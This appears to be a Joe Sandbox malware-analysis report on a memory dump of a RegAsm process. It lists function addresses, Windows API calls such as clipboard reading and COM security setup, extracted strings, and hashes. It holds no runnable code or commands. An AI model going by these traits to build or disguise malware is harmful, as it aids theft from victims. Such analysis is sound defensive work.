LdrInitializeThunk.NTDLL(0043F08B,005C003F,0000000B,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B62E

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
Instruction ID: 88b266f08c8d8dc656098dc4a5309144cffe720ba9f358246b073a6e310c2786
Opcode Fuzzy Hash: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
Instruction Fuzzy Hash: 47E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 004387C0 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

}z{x, xrefs: 00438826

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: }z{x
API String ID: 2994545307-1935807464
Opcode ID: 7989b024d2c3b9fdf2d6e896aa61e9d2001099f6112cdbacafbd7d081e94b363
Instruction ID: a1b4afff401769b8bc283542711eec1d6d79511bf8af7d4ccfdd19c03198b9c9
Opcode Fuzzy Hash: 7989b024d2c3b9fdf2d6e896aa61e9d2001099f6112cdbacafbd7d081e94b363
Instruction Fuzzy Hash: 797159369053108BD7149A2DC88436BF7A2EB8A714F29E57EE8996B391CB34DC0197C6

Function 0043F880 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

@, xrefs: 0043F8E9

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 1b48745ee9b29d4670508d75d6af05d28424f9ff617e2911ae8345f7b890af72
Instruction ID: 6da14dff6695a29b7a138f1b5872fd1f2216a7a8924e699d2d19755c0f6557e7
Opcode Fuzzy Hash: 1b48745ee9b29d4670508d75d6af05d28424f9ff617e2911ae8345f7b890af72
Instruction Fuzzy Hash: 7931F0755183049BC714DF18C88176BFBF5EF89314F05A82EE9A547290E73899088BAA

Function 004247C0 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6f234a0b522ea11eabac60d3ff064bbff935bb36c70d1fb48d6f706d1bc80fb
Instruction ID: 050cd24433f61f3763ad39defb1fc8a13c057351b8bc1ee48cf204f6d01fffd2
Opcode Fuzzy Hash: b6f234a0b522ea11eabac60d3ff064bbff935bb36c70d1fb48d6f706d1bc80fb
Instruction Fuzzy Hash: 77C15B727083204BD714CF28E8923ABBBD2EBD1304F59853EE8968B381D63DDD058799

Function 00440330 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6461e9910320006a2e0836e55b9623e1c16260eee26792255f72b859ace59332
Instruction ID: 58a69b57af7e24ee3c62efa82a7d8eee2b8501685cdd5d883de90afc41c95a7c
Opcode Fuzzy Hash: 6461e9910320006a2e0836e55b9623e1c16260eee26792255f72b859ace59332
Instruction Fuzzy Hash: 728126326083109BE728CF14C85176BB7E2EFC5314F19852EEA9647391DB79DC158B8A

Function 0043F9D0 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e0a6a076834877b40c9be7990687a0251f09cf916669bfc8046d1d2174da018
Instruction ID: 448ffca5d87b80d32822c8b64973462d570a6b027f83770f115344b2745d6aa8
Opcode Fuzzy Hash: 8e0a6a076834877b40c9be7990687a0251f09cf916669bfc8046d1d2174da018
Instruction Fuzzy Hash: A6813976A183055BD714AF18C85073BB3E2FFC9350F09A43EE8858B351EB38E915979A

Function 00438330 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 57e6c0a788ac01376f2d27b22cbd0b537e628117152a91b9aa99e78e6868a310
Instruction ID: 767567ce47251ea28a1813ea366a1b038ceed0e869b8d918d7d8446cf86f5ca2
Opcode Fuzzy Hash: 57e6c0a788ac01376f2d27b22cbd0b537e628117152a91b9aa99e78e6868a310
Instruction Fuzzy Hash: 2D517C766083015BD7148B28C85473BF7A1EBDA754F29A47EF4C66B382EA34DC01879A

Function 0041DAD0 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aeb0bebc72e8b8a55697ddec9a848093945708c80ef1decd1f7b9832504b335
Instruction ID: 6a3c87ed268c674eb99f3637c0156bf68a3d7e0a263c8b87bddcd13a1fbb2be6
Opcode Fuzzy Hash: 4aeb0bebc72e8b8a55697ddec9a848093945708c80ef1decd1f7b9832504b335
Instruction Fuzzy Hash: EB312A75A08604EFD704DF28DC45BAB77E8EB8A354F14493DF849C7281E238D94587AA

Function 00411204 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000001), ref: 00411317
ExitProcess.KERNEL32(00000003), ref: 00411337
ExitProcess.KERNEL32(00000001), ref: 00411357
ExitProcess.KERNEL32(00000001), ref: 00411377

Strings

Z, xrefs: 00411264

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: ExitProcess
String ID: Z
API String ID: 621844428-1505515367
Opcode ID: 7db3afaa4306f1bcee78401605168040110c24e84f1d1c2a3248a5ab23f704a2
Instruction ID: 7ac7095e787f66665aa3dcbb55ee2acb77b64e2a3ff96d475d68631c8037dee2
Opcode Fuzzy Hash: 7db3afaa4306f1bcee78401605168040110c24e84f1d1c2a3248a5ab23f704a2
Instruction Fuzzy Hash: 4531F5B0A5979047F711A721A822BEF77D4AF92358F04093DE589A3283DB3D5509829F

Function 0040D400 Relevance: 6.0, APIs: 4, Instructions: 34
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0040D44A
GetForegroundWindow.USER32 ref: 0040D450
GetCurrentProcessId.KERNEL32 ref: 0040D45A
ExitProcess.KERNEL32 ref: 0040D47A

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentProcess$ExitForegroundThreadWindow
String ID:
API String ID: 3118123366-0
Opcode ID: 17cc16c0ba72b8ddc0396a5f799a5ad826925f4b051eeba5302ac1a7e6bb8a34
Instruction ID: a18b284b2e66d058522ee5bde7d4ca9708ea0d3b90004192466f8b4187448e12
Opcode Fuzzy Hash: 17cc16c0ba72b8ddc0396a5f799a5ad826925f4b051eeba5302ac1a7e6bb8a34
Instruction Fuzzy Hash: D0F0F07090820047D7147FB2981E72E7B51AF52B8EF00447EA5C6BB2D7DE3D94058A2E

Function 0042CBE4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042CC2A

Strings

m>hF, xrefs: 0042CC46

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID: m>hF
API String ID: 3890896728-898274283
Opcode ID: 9e17cb7cebdc63ed7f94fa66740fca5ac92760bc485fdd5c13d8e1f27dedcdea
Instruction ID: 61c423f2da36b7ac1fa402b5061fcb009773d313ebc379a7c9e230c2ac7043c6
Opcode Fuzzy Hash: 9e17cb7cebdc63ed7f94fa66740fca5ac92760bc485fdd5c13d8e1f27dedcdea
Instruction Fuzzy Hash: 88F074B45087019FE354DF29D5A871ABBF0FB84304F00891CE5D99B3A0DBB5AA49CF86

Function 0043C3CE Relevance: 3.0, APIs: 2, Instructions: 14COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043C3CE
GetForegroundWindow.USER32 ref: 0043C3DD

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 65e3a1b7659f90bbfb522b749dff0ded02fbb0bb1f6bff72cd7de80a9b647f8f
Instruction ID: 3d74f6937b0da6f9bb753501b6533d13d5f28c94efa54478c9cbf2e46fb409f1
Opcode Fuzzy Hash: 65e3a1b7659f90bbfb522b749dff0ded02fbb0bb1f6bff72cd7de80a9b647f8f
Instruction Fuzzy Hash: 81D0A9BA5120009BA209EB22BC0A84F3216AF8AA0F7244479E40702296EF265602C78F

Function 00438266 Relevance: 1.6, APIs: 1, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0043831E

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 30165f6662e71da6cf67b059ec6711a0b1a5ea863487de7cbfa1e172c87ef5b4
Instruction ID: f83ec565af989f546f89ac4021099bd9b02803395ba86297f2ea752137e99ac7
Opcode Fuzzy Hash: 30165f6662e71da6cf67b059ec6711a0b1a5ea863487de7cbfa1e172c87ef5b4
Instruction Fuzzy Hash: A0117A37E066108BD31CCB28CC9166AB713EBC1315F2DC27DC952977A8CE350C0186C4

Function 0043B550 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,00000000), ref: 0043B5CB

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6819beeecc388cd5d2934476fbb51b062ddfc78142f39ed6c36330f4b67dcea6
Instruction ID: 74823947c3c425b37561a34d9b8d2efd2942ac18d914846c4d006f22053594ee
Opcode Fuzzy Hash: 6819beeecc388cd5d2934476fbb51b062ddfc78142f39ed6c36330f4b67dcea6
Instruction Fuzzy Hash: 51012871A152019BD304AF75EC5561BB7A6EFCA305F08843DE9C446211E739C8469696

Function 0042F451 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042F495

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: d84a3cc36e79e2c4c7bc0645f49e781a8ea4556c57b39dbc4e76dab9bc9fa6fc
Instruction ID: 18e0713c30ec81aa62a71d0ecc001b21a065892b9bc9aeccd5b104f9934267ec
Opcode Fuzzy Hash: d84a3cc36e79e2c4c7bc0645f49e781a8ea4556c57b39dbc4e76dab9bc9fa6fc
Instruction Fuzzy Hash: BDF07AB450C341CFE754DF28C5A871BBBE0BB89314F10891CE5998B390C7B59549CF82

Function 00410BD0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 00410BE3

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e7474e31947500fa4415328581472b616a3b11b002a1a73309fa97bbe2141a31
Instruction ID: b4532f2fe372d2cb61c90b12c54696faac8a3f2e77a6efe18e9fc46a379e6e33
Opcode Fuzzy Hash: e7474e31947500fa4415328581472b616a3b11b002a1a73309fa97bbe2141a31
Instruction Fuzzy Hash: E9D09720A948002BD208AB3CEC0AF223A5CEB43726F400238FA938A1C3EC802910C178

Function 00410C05 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410C17

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: b1555e55e99654be8936181e32e02c6337ee16ac9d16533d8328badfa98fe05d
Instruction ID: f1029602b035823865252b0fa187f8e0862bec21c64ceb27c466c7e5c6614e77
Opcode Fuzzy Hash: b1555e55e99654be8936181e32e02c6337ee16ac9d16533d8328badfa98fe05d
Instruction Fuzzy Hash: 54D0C9343E47417BF9248B08AC13F143250670AF1AF700765B322FE2E6C9D071218A0D

Function 00438212 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00438218

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 963df09372b50f607ed52231854c4d59acc99289afda96f9f19167c0996b0e99
Instruction ID: 210aa2dafe0433a51058e8b7290a016339c139d8b012400ed691351da44ce6b3
Opcode Fuzzy Hash: 963df09372b50f607ed52231854c4d59acc99289afda96f9f19167c0996b0e99
Instruction Fuzzy Hash: 0DB092322802045AE9001B48BC05BA4B718EB8066BF200072EA0C880A2D113997A96A8

Non-executed Functions

Function 00401000 Relevance: 23.3, Strings: 17, Instructions: 2035COMMON

Download Yara Rule

Strings

gfff, xrefs: 00402555
, xrefs: 004037AB
0123456789abcdefxp, xrefs: 004013EE, 0040145E
, xrefs: 004037C0
, xrefs: 004037B9
, xrefs: 0040379D
, xrefs: 004037B2
gfff, xrefs: 0040256A
, xrefs: 004037A4
gfff, xrefs: 00402605
-, xrefs: 00402507
0123456789ABCDEFXP, xrefs: 004013E4, 00401451
., xrefs: 00401BCB
gfff, xrefs: 004025BF
@, xrefs: 0040303E
, xrefs: 00403836
A, xrefs: 004024EB

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $ $ $ $ $ $ $-$.$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff$gfff
API String ID: 0-1406891699
Opcode ID: 5fe6e12a2638e5e605a89a1e74ce025d297c4aa3b5c22920f4a89750c369ff99
Instruction ID: 487080ebca6db4a2f4a63b791c6092a307c28b1da33addde68164491a41eba4e
Opcode Fuzzy Hash: 5fe6e12a2638e5e605a89a1e74ce025d297c4aa3b5c22920f4a89750c369ff99
Instruction Fuzzy Hash: FAE2F1716083418FC718CF28C49462BBBE2ABD5314F18867EE895AB3D1D779DD06CB86

Function 00401277 Relevance: 21.0, Strings: 16, Instructions: 953COMMON

Download Yara Rule

Strings

., xrefs: 00402248
0000, xrefs: 004038EA
0, xrefs: 00402411
0000, xrefs: 004038F1
0, xrefs: 00401EB0
0000, xrefs: 00403906
0, xrefs: 004023DB
0000, xrefs: 004038FF
0000, xrefs: 004038F8
i, xrefs: 0040291C
,, xrefs: 00401E1F
0000, xrefs: 004038DC
0, xrefs: 004023B8
@, xrefs: 00402391
0000, xrefs: 004038E3
0, xrefs: 00402233

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,$.$0$0$0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
API String ID: 0-592371532
Opcode ID: 7cbe558533fb7ae0152581f9e816e16b4e27f59ca6ce2b0f46bc5befc4961d0b
Instruction ID: f632d19e1011d4e84aad26c661c6e5d435a4fac7925595ca077130d337c29d85
Opcode Fuzzy Hash: 7cbe558533fb7ae0152581f9e816e16b4e27f59ca6ce2b0f46bc5befc4961d0b
Instruction Fuzzy Hash: 2B72E3756093418FD314CE28C58475BBBE1BBC5304F188A7EE89AA73D1D3B9DD058B8A

Function 00424C70 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501COMMON

Download Yara Rule

Strings

}z{x, xrefs: 00425AF4
01, xrefs: 00425789
F}w, xrefs: 004257A2
ps, xrefs: 00425666
RZB, xrefs: 00425A43
xZB, xrefs: 00425A72
XZB, xrefs: 00425A52

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 01$F}w$RZB$XZB$ps$xZB$}z{x
API String ID: 0-2234522390
Opcode ID: 46b6d3e947f041b38adcfd8ca33e6657c97d90b68ebb27657bc05c9d464e549c
Instruction ID: 7c75d544a8c29c11e0f6f274e536c446b85ab27432b89beb213d306bd112cb90
Opcode Fuzzy Hash: 46b6d3e947f041b38adcfd8ca33e6657c97d90b68ebb27657bc05c9d464e549c
Instruction Fuzzy Hash: EBF145B1A183508FD3208F65E88576BBBE1FBC6318F498A2DE4D49B351D7788805CB97

Function 00423DD0 Relevance: 10.5, Strings: 8, Instructions: 483COMMON

Download Yara Rule

Strings

!Y)[, xrefs: 00423E57
7E9G, xrefs: 00423E8F
}z{x, xrefs: 00424146
9Q>S, xrefs: 00423E67
(],_, xrefs: 00423E5F
a%a', xrefs: 00423E4F
}z{x, xrefs: 00424436
5M0O, xrefs: 00423E7F

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !Y)[$(],_$5M0O$7E9G$9Q>S$a%a'$}z{x$}z{x
API String ID: 0-3640916644
Opcode ID: b97c1ed88e3d31725ddd3fb39334953d3a5a36b18cccd788339356fcf47fbaec
Instruction ID: 8038b8fc89dd961067976e9b5db2b0514576f957f4e335a3c0ff1a04589f3cd3
Opcode Fuzzy Hash: b97c1ed88e3d31725ddd3fb39334953d3a5a36b18cccd788339356fcf47fbaec
Instruction Fuzzy Hash: 75F1E0B9608350DFE3148F25E88176BBBE2FBC6308F55992DE5C48B351D7789806CB46

Function 00430850 Relevance: 9.1, APIs: 6, Instructions: 148clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00430874
GetWindowLongW.USER32 ref: 004308A1
GetClipboardData.USER32 ref: 004308B1
GlobalLock.KERNEL32 ref: 004308CE

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$DataGlobalLockLongOpenWindow
String ID:
API String ID: 2401467216-0
Opcode ID: 80ae8dc8c6d18b1cee28cd6ec83ed87ed6a750223610910af8073deb50422026
Instruction ID: 9f61a7f57793e4596e5270650fb0acd557b46b5302941234fdd1030700afe210
Opcode Fuzzy Hash: 80ae8dc8c6d18b1cee28cd6ec83ed87ed6a750223610910af8073deb50422026
Instruction Fuzzy Hash: 9051F3B18087918FE710AF7C9849359BFA0AF0A320F04873EE4A5972C6D3389915C7DB

Function 0041C513 Relevance: 6.5, Strings: 5, Instructions: 237COMMON

Download Yara Rule

Strings

9A-_, xrefs: 0041C59A
.]z[, xrefs: 0041C5A2
O1nO, xrefs: 0041C57A
\9Y7, xrefs: 0041C5F1
7Y+W, xrefs: 0041C5AA

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: .]z[$7Y+W$9A-_$O1nO$\9Y7
API String ID: 0-3103464985
Opcode ID: 1d7e6db69ed658b59888eda7bcc29677fade6b36f2f0ccfe7b9835da22dba30b
Instruction ID: 0b6c74c9a379bff11fef6752102846e2e17ce21d8912ff1bac0dfa61de8bd882
Opcode Fuzzy Hash: 1d7e6db69ed658b59888eda7bcc29677fade6b36f2f0ccfe7b9835da22dba30b
Instruction Fuzzy Hash: 9E61F472908361CBC714CF25DC812ABBBB1EF91748F18856DE4C45B351E339D946CB96

Function 0041C52A Relevance: 6.5, Strings: 5, Instructions: 233COMMON

Download Yara Rule

Strings

9A-_, xrefs: 0041C59A
.]z[, xrefs: 0041C5A2
O1nO, xrefs: 0041C57A
\9Y7, xrefs: 0041C5F1
7Y+W, xrefs: 0041C5AA

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: .]z[$7Y+W$9A-_$O1nO$\9Y7
API String ID: 0-3103464985
Opcode ID: 4cf5652ecf1bc13ba8969e941ffec233667405590163c8fd6cf79d4d2287ef0f
Instruction ID: 33433c1cf5a6180f53deb35bc3d05ad82548ba427fd27d41d3c12cab20251898
Opcode Fuzzy Hash: 4cf5652ecf1bc13ba8969e941ffec233667405590163c8fd6cf79d4d2287ef0f
Instruction Fuzzy Hash: 1C610572908361CBC7148F25DC812ABBBB2EFD1744F18896DE8C45B351E339D946CB96

Function 00430A30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00430A72
GetSystemMetrics.USER32 ref: 00430A82

Strings

, xrefs: 00430B6F

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 848ca4ac9c7c9123e47ac06bf2781841a63368e1a9ee2891494c07c3ac6088da
Instruction ID: fbbce7ad633b07f750d1d39319c3832ca9b6930809a03d8f12be590156538362
Opcode Fuzzy Hash: 848ca4ac9c7c9123e47ac06bf2781841a63368e1a9ee2891494c07c3ac6088da
Instruction Fuzzy Hash: 77A14CB040D3818BE370DF54C58879BBAE0BB85308F508D2EE5994B350DBB9594ACF97

Function 00408960 Relevance: 4.1, Strings: 3, Instructions: 391COMMON

Download Yara Rule

Strings

IEND, xrefs: 00408DC0
), xrefs: 004089DC
), xrefs: 004089E6

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: c5c8fa8975e90c00b6fff2f16777a39e1fc21c1793c43ec1ac37d209ff79c10b
Instruction ID: 3fe9b987952ccde178efa9f1f1c00db419640494b095269c1b53dd01ec44560a
Opcode Fuzzy Hash: c5c8fa8975e90c00b6fff2f16777a39e1fc21c1793c43ec1ac37d209ff79c10b
Instruction Fuzzy Hash: E9E1B071A087019FE310DF28C88571ABBE0BB94314F14463EE999A73D1DB79E915CBCA

Function 0040F0B0 Relevance: 4.1, Strings: 3, Instructions: 367COMMON

Download Yara Rule

Strings

(), xrefs: 0040F266
0, xrefs: 0040F0CE
2, xrefs: 0040F4A5

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ()$0$2
API String ID: 0-2766669394
Opcode ID: b431683c6e682e94ca6e93cbb4d2751a54d99ebcda0fd91457817300398900ae
Instruction ID: 866e2b648f7bcc383e22ba6bbda90a5c047cd05d48a8e8d2e44f1a1a3b7545c2
Opcode Fuzzy Hash: b431683c6e682e94ca6e93cbb4d2751a54d99ebcda0fd91457817300398900ae
Instruction Fuzzy Hash: 1CC1D47050C3805BD324CF29D45036BBBE2ABD2358F18897DE4D59B792D779884ACB86

Function 0043BBB1 Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

yt/, xrefs: 0043BCB7
yt/, xrefs: 0043BBEA
Zly, xrefs: 0043BC6A

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Zly$yt/$yt/
API String ID: 0-753245582
Opcode ID: 6d50fe596ce45943e37491d3dc783259b6d4f02450cd38f04fe773c11fcd919d
Instruction ID: 43c425d19c7a5dd9d2b0e9e6ee396766c4f387a1a8bde8379edbf945f8c64b42
Opcode Fuzzy Hash: 6d50fe596ce45943e37491d3dc783259b6d4f02450cd38f04fe773c11fcd919d
Instruction Fuzzy Hash: 9C41DD75A5929A8BCB18CF25C8D1677B7B1FF45301B08A49DC841AF39ADB38D90287D8

Function 0042B0EC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 334COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042B421

Strings

v, xrefs: 0042B421

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary
String ID: v
API String ID: 3664257935-704655076
Opcode ID: 1431d6d7878cf9ae64f9511afd6a5dfb7ec890bf9ec57de7d701933aa395053b
Instruction ID: d6aa1a83b84c1add582603f22629dbbc92b886d6759163826391720d4c9d0c94
Opcode Fuzzy Hash: 1431d6d7878cf9ae64f9511afd6a5dfb7ec890bf9ec57de7d701933aa395053b
Instruction Fuzzy Hash: 7BB1F270604B418BD324CF29D891BA3BBE2EF61304F188B6DD4D74B786D739A409CBA5

Function 0041102F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0041102F

Strings

-4, xrefs: 00411FAE

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: Uninitialize
String ID: -4
